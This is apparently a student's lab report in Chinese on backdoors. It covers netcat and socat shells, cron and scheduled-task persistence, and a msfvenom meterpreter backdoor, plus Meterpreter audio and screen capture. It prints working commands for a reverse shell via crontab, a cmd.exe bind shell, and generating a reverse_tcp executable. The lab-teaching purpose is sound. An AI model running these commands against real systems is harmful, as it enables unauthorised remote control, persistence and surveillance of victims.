20155327Exp2 後門原理與實踐

20155327Exp2 後門原理與實踐

1、實驗說明

任務一：使用netcat獲取主機操做Shell，cron啓動 (0.5分)

任務二：使用socat獲取主機操做Shell, 任務計劃啓動 (0.5分)

任務三：使用MSF meterpreter（或其餘軟件）生成可執行文件，利用ncat或socat傳送到主機並運行獲取主機Shell(0.5分)

任務四：使用MSF meterpreter（或其餘軟件）生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容，並嘗試提權 (2分)

2、基礎問題回答

(1)例舉你能想到的一個後門進入到你係統中的可能方式？

多是咱們點開某個連接的時候，自動加載了某個可執行文件，就相似於執行了實驗中傳入到windows中的backdoor.exe；也多是咱們點開某個網頁時，該網頁經過木馬的方式在咱們不知情的狀況下自動下載了某個後門文件。

(2)例舉你知道的後門如何啓動起來(win及linux)的方式？

linux中可能crontab文件被修改，週期性（定時）反向鏈接控制主機，只要控制主機保持偵聽狀態，就能夠週期性啓動後門，控制被控主機。
windows中多是被動下載、接收了後門程序，當被控端點擊運行該程序時，後門便會啓動。

(3)Meterpreter有哪些給你映像深入的功能？

可以獲取被控主機的麥克風錄音、獲取被控主機的攝像頭拍照和錄像。

(4)如何發現本身有系統有沒有被安裝後門？

利用防火牆，在防火牆看開啓的端口及對應的進程，通常不是系統默認開啓的端口都是可疑的，要找一下對應的進程，找到對應進程，對相應進程進行抓包，看他通訊的數據，分析是否是後門。

按期用360管家等軟件對系統進行檢測，及時處理疑似病毒、木馬的程序。

1. 經常使用後門工具

   任務一：Windows得到Linux Shell

一、在Windows下使用ipconfig查看本機IP：

二、使用ncat.exe程序監聽本機的5303端口：

三、在Kali環境下，使用nc指令的-e選項反向鏈接Windows主機的5303端口：

四、成功得到Kali的shell，以下圖所示：

任務二：Linux得到Windows Shell

一、在Kali環境中使用ifconfig查看IP：

二、使用nc指令監聽5303端口：
三、在Windows下，使用ncat.exe程序的-e選項項反向鏈接Kali主機的5303端口：
四、Kali下能夠看到Windows的命令提示，能夠輸入Windows命令：

任務三：使用nc傳輸數據

一、Windows下監聽5303端口：

二、Kali下鏈接到Windows的5303端口：

三、創建鏈接以後，就能夠傳輸數據了：

返回目錄

1. Meterpreter
   任務一：使用netcat獲取主機操做Shell，cron啓動

一、在Windows系統下，監聽5303端口：

二、用crontab -e指令編輯一條定時任務

三、在最後一行添加45 * * * * /bin/netcat 172.16.8.28 5303 -e /bin/sh，意思是在每一個小時的第45分鐘反向鏈接Windows主機的5303端口：

四、當時間到了17點45時，此時已經得到了Kali的shell，能夠輸入指令：

任務二：使用socat獲取主機操做Shell, 任務計劃啓動

預備知識：

實踐過程：
一、在win10系統下，右擊屏幕左下角windows圖標，選擇「計算機管理」。

在任務計劃程序建立任務，填寫任務名稱，並新建一個觸發器。

二、在操做->程序或腳本中選擇你的socat.exe文件的路徑，在添加參數一欄填寫tcp-listen:5303 exec:cmd.exe,pty,stderr，這個命令的做用是把cmd.exe綁定到端口5303，同時把cmd.exe的stderr重定向到stdout上：

三、建立完成以後，按Windows+L快捷鍵鎖定計算機，再次打開時，能夠發現以前建立的任務已經開始運行：

四、此時，在Kali環境下輸入指令socat - tcp:172.30.4.253:5303，這裏的第一個參數-表明標準的輸入輸出，第二個流鏈接到Windows主機的5215端口，此時能夠發現已經成功得到了一個cmd shell：

任務三：使用MSF meterpreter生成可執行文件，利用ncat或socat傳送到主機並運行獲取主機Shell

一、輸入指令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.4.253 LPORT=5303 -f exe > 20155303_backdoor.exe

生成後門程序：

二、經過nc指令將生成的後門程序傳送到Windows主機上：

三、在Kali上使用msfconsole指令進入msf控制檯，使用監聽模塊，設置payload，設置反彈回連的IP和端口：

四、設置完成後，執行監聽：

五、運行Windows下的後門程序：

六、此時Kali上已經得到了Windows主機的鏈接，而且獲得了遠程控制的shell：

任務四：使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容

使用record_mic指令能夠截獲一段音頻：

使用screenshot指令能夠進行截屏：